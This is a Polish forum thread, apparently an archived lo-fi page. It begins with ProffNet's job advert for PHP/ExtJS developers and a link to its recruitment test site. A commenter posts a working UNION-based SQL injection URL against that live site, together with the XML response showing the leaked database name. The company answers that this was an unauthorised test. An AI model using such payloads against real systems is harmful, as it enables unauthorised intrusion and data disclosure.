Firma ProffNet sp. z o.o. poszukuje programistów do stałej współpracy przy realizacji bieżących zadań.
Co oferujemy:
- Możliwość pracy zdalnej lub nowoczesnym biurze firmy w Będzinie
- Szkolenia produktowe, pozwalające na skuteczne wykonywanie powierzonych zadań.
- Atrakcyjne wynagrodzenie.
- Dodatkowe gratyfikacje wynikające wykazanego zaangażowania i terminowości wykonywanych zadań
- Rozliczenia na zasadzie umowy zlecenie, umowy o dzieło lub umowy o współpracy (na podst. Faktur Vat)
- Stałą i stabilną współpracę.
- Terminowe wypłacanie należności za wykonane zlecenia.
Do zadań osób współpracujących będzie należało:
1. Utrzymanie i rozbudowa autorskiego oprogramowania klasy CMMS w tym:
- dostosowywanie oprogramowania do bieżących potrzeb klientów
- debugowanie i bieżąca aktualizacja oprogramowania
- dopisywanie nowych modułów programu
- re-faktoryzacja kodu
- tworzenie bieżącej dokumentacji
2. Modyfikacja istniejących templatek sklepów i stron www opartych o autorski system uniPanel.
3. Drobne aktualizacje istniejących stron www dotychczasowych klientów
Aby skutecznie realizować powierzone zadania wymagana będzie wiedza z zakresu posługiwania się:
- PHP 5
- Framework javascript ExtJS
- Javascript
- Umiejętności czytania dokumentacji
- CSS3
- MySql
- NetBeans, Eclipse, itp..
- Repozytorium Git
Możliwość rozszerzenia zakresu zleceń ułatwi również znajomość
- Java Play Framework
Informacje o wynagrodzeniu
Wynagrodzenie rozliczane będzie jako wypadkowa stawki godzinowej oraz szaczowanej ilości godzin roboczych spędzonych nad poszczególnymi zadaniami.
Wysokość stawki godzinowej jest bezpośrednio uzależniona od doświadczenia kandydata.
Prosimy o podawanie w ofercie proponowanych stawek godzinowych.
Pod uwagę będą brane TYLKO kandydatury osób które prześlą na adres praca(at)proffnet.com:
1. Propozycje rozwiązania zadania znajdującego się na stronie: http://www.zadanie-testowe.proffnet.com/ oraz czas w jakim zadanie zostało przez nich wykonane.
2. Informacje na temat przebiegu dotychczasowej działalności wraz z listą projektów z ich udziałem i zakresem swojej pracy w danym projekcie
3. Ilości godzin w miesiącu, które są w stanie poświęcić na pracę zdalną (lub w naszym biurze)
4. Proponowaną stawkę za godzinę roboczą
Dane firmy:
Biuro
al. Kołłątaja 46
42-500 Będzin
Siedziba
Proffnet Sp. z o.o.
ul. Przedziałowa 24
42-523 Dąbrowa Górnicza
Nip: 629-244-69-63;
Regon: 241719977;
KRS: 0000365205
Gratuluję, bo mimo używania PDO zadanie testowe posiada błędy typu SQL injection.
@redeemer
Wydaje Pan dosyć pochopne osądy, nie wiedząc jak działa Request::getParameter.
Proszę mi wierzyć, że SQL injection nie zadziała w tym przypadku.
Zapraszam do rozwiązania testu. Jeśli uważa się Pan za osobę bieglą w php i javascript (i umiejącą czytać dokumentacje do ExtJs w wypadku braku znajomości tego framework'a) rozwiązanie testu nie powinno zająć Panu więcej niż 5 minut.
Wynik testu proszę przesłać na praca(at)proffnet.com może uda nam się z pożytkiem dla Pana wykorzystać Pańską wiedzę i doświadczenie.
Wydaje Pan dosyć pochopne osądy, nie wiedząc jak działa Request::getParameter.
Proszę mi wierzyć, że SQL injection nie zadziała w tym przypadku.
Zapraszam do rozwiązania testu. Jeśli uważa się Pan za osobę bieglą w php i javascript (i umiejącą czytać dokumentacje do ExtJs w wypadku braku znajomości tego framework'a) rozwiązanie testu nie powinno zająć Panu więcej niż 5 minut.
Wynik testu proszę przesłać na praca(at)proffnet.com może uda nam się z pożytkiem dla Pana wykorzystać Pańską wiedzę i doświadczenie.
To prawda, że nie wiem dokładnie jak działa Request::getParameter, jednak nie zmienia to faktu, że skrypt jest podatny na SQL injection.
Dowód:
Zwrot:
Jeżeli polegacie tylko na funkcji Request::getParameter jeśli chodzi o bezpieczeństwo to polecam ją albo udoskonalić, albo lepiej użyć PDO do zabezpieczenia przed tego typu atakami.
Dowód:
Kod
http://www.zadanie-testowe.proffnet.com/?_dc=1379503543121&request=grid%2Fdefault&page=2&start=1%20union%20select%20database(),0x73716c20696e6a656374696f6e,3,4%20--%20&limit=costamcostam&sort=%5B%7B%22property%22%3A%22tst_continent%22%2C%22direction%22%3A%22ASC%22%7D%5D
Zwrot:
Kod
<rs>
<total>
<![CDATA[ 19 ]]>
</total>
<r>
<tst_id>
<![CDATA[ 1 ]]>
</tst_id>
<tst_continent>
<![CDATA[ Afryka ]]>
</tst_continent>
<tst_country>
<![CDATA[ Algieria ]]>
</tst_country>
<tst_capital>
<![CDATA[ Algier ]]>
</tst_capital>
</r>
<r>
<tst_id>
<![CDATA[ baza58949_zadtest ]]>
</tst_id>
<tst_continent>
<![CDATA[ sql injection ]]>
</tst_continent>
<tst_country>
<![CDATA[ 3 ]]>
</tst_country>
<tst_capital>
<![CDATA[ 4 ]]>
</tst_capital>
</r>
</rs>
<total>
<![CDATA[ 19 ]]>
</total>
<r>
<tst_id>
<![CDATA[ 1 ]]>
</tst_id>
<tst_continent>
<![CDATA[ Afryka ]]>
</tst_continent>
<tst_country>
<![CDATA[ Algieria ]]>
</tst_country>
<tst_capital>
<![CDATA[ Algier ]]>
</tst_capital>
</r>
<r>
<tst_id>
<![CDATA[ baza58949_zadtest ]]>
</tst_id>
<tst_continent>
<![CDATA[ sql injection ]]>
</tst_continent>
<tst_country>
<![CDATA[ 3 ]]>
</tst_country>
<tst_capital>
<![CDATA[ 4 ]]>
</tst_capital>
</r>
</rs>
Jeżeli polegacie tylko na funkcji Request::getParameter jeśli chodzi o bezpieczeństwo to polecam ją albo udoskonalić, albo lepiej użyć PDO do zabezpieczenia przed tego typu atakami.
Witam ponownie
Ma Pan rację co do konkretnego powyższego zapytania. Jednakże proszę zauważyć, iż skrypt ten jest pisany do celów wyłącznie rekrutacyjnych, bez zbędnych linijek kodu które w tym wypadku nic by nie wniosły - jak sam Pan raczył zauważyć, działa także na wyizolowanej bazie danych oraz jest wystawiane jako white-box.
Nie wiem czy jest Pan tego świadomy skrypt ten jednocześnie spełnił swoją rolę - pozyskując ludzi takich jak Pan do konwersacji. Z jednej strony złamał Pan prawo wykonując niezamówione pentesty naszego skryptu/serwera, z drugiej byliśmy w pełni świadomi tego typu działania ze strony takich ludzi jak Pan, choć spodziewaliśmy się działania typu wysłanie wiadomości na priv, a nie publicznego obnażania, co było poniekąd niegrzeczne z pańskiej strony. A jak wiemy kolejność powinna być odwrotna, co nakazuje nam czysta przyzwoitość.
Pomijając ten fakt, wszyscy jesteśmy tylko ludzi panie Marcinie - proszę o tym nie zapominać.
Proponuję Panu więc jeszcze raz skorzystać z naszej oferty, być może będzie miał Pan okazję legalnego potestowania naszego kodu
Widzimy że jest Pan człowiekiem posiadającym pewną wiedzę i obym się nie mylił skory do owocnej współpracy, lecz aby była zadość formalnością proszę poprawnie rozwiązać zadanie.
Ma Pan rację co do konkretnego powyższego zapytania. Jednakże proszę zauważyć, iż skrypt ten jest pisany do celów wyłącznie rekrutacyjnych, bez zbędnych linijek kodu które w tym wypadku nic by nie wniosły - jak sam Pan raczył zauważyć, działa także na wyizolowanej bazie danych oraz jest wystawiane jako white-box.
Nie wiem czy jest Pan tego świadomy skrypt ten jednocześnie spełnił swoją rolę - pozyskując ludzi takich jak Pan do konwersacji. Z jednej strony złamał Pan prawo wykonując niezamówione pentesty naszego skryptu/serwera, z drugiej byliśmy w pełni świadomi tego typu działania ze strony takich ludzi jak Pan, choć spodziewaliśmy się działania typu wysłanie wiadomości na priv, a nie publicznego obnażania, co było poniekąd niegrzeczne z pańskiej strony. A jak wiemy kolejność powinna być odwrotna, co nakazuje nam czysta przyzwoitość.
Pomijając ten fakt, wszyscy jesteśmy tylko ludzi panie Marcinie - proszę o tym nie zapominać.
Proponuję Panu więc jeszcze raz skorzystać z naszej oferty, być może będzie miał Pan okazję legalnego potestowania naszego kodu
Widzimy że jest Pan człowiekiem posiadającym pewną wiedzę i obym się nie mylił skory do owocnej współpracy, lecz aby była zadość formalnością proszę poprawnie rozwiązać zadanie.
*formalnościom - Nie mogłem się powstrzymać.
heheszki
Cytat
Proszę mi wierzyć, że SQL injection nie zadziała w tym przypadku.
Cytat
Proszę mi wierzyć, będzie Pan u nas zarabiał xxxx zł
heheszki
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.